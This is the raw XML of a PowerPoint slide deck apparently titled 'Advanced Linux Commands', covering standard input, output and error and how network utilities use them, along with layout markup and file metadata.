              <a:ext cx="7560" cy="7200"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="4" name="Ink 3">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1432862E-03CB-4412-166B-0D44F528ACDF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="5540969" y="5413563"/>
                <a:ext cx="25200" cy="24840"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167425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descr="Colourful network cables">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9C85A00-7141-941D-1A2A-2E618F4DA8F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="8717" r="1417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Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1138723" y="2900613"/>
            <a:ext cx="4088190" cy="2369093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100" dirty="0"/>
              <a:t>Network utilities use standard devices </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Connector 2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Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8590663" y="6041362"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="914400">
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3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18429501"/>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3595</TotalTime>
  <Words>922</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>149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Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Helvetica</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Facet</vt:lpstr>
      <vt:lpstr>Advanced Linux Commands</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Standard input/output/error devices</vt:lpstr>
      <vt:lpstr>Input and output devices are files (0,1,2)!</vt:lpstr>
      <vt:lpstr>Standard output: stdout</vt:lpstr>
      <vt:lpstr>Another example</vt:lpstr>
      <vt:lpstr>Standard input: stdin</vt:lpstr>
      <vt:lpstr>Standard error: stderr</vt:lpstr>
      <vt:lpstr>Network utilities use standard devices </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Sajin.Shivdas@fdf.gov.ae</dc:creator>
  <cp:lastModifiedBy>Sajin Shivdas Sivadasan Shridharan</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-14T14:43:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-23T06:10:45Z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2022-09-05T12:28:35Z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0f084cfb-078a-4cb3-b4bd-6d0825afb445</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>